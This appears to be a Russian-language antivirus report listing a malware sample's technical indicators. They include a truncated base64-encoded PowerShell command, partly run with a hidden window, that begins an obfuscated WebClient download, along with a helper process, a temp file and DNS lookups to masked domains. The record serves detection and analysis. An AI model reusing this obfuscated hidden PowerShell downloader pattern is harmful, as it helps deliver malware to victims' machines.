Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAQwBBADQAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYgBBAEMAUQBCACcALAAnAHcAJwApADsAJABSAEIAXwBBAGsAVQBBAF8APQBuAGUAdwBgAC0ATwBiAGAASgBgAEUAYwBUACAAKAAnAE4AZQB0AC4AVwAnACsAJwBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1170662.cvr
- DNS ASK ew##c.com
- DNS ASK pe####profilers.vn
- DNS ASK 11##o.com
- DNS ASK wo######s.carelesscloud.com
- DNS ASK tr##ay.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAQwBBADQAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAYgBBAEMAUQBCACcALAAnAHcAJwApADsAJABSAEIAXwBBAGsAVQBBAF8APQBuAGUAdwBgAC0ATwBiAGAASgBgAEUAYwBUACAAKAAnAE4AZQB0AC4AVwAnACsAJwBlAG...' (со скрытым окном)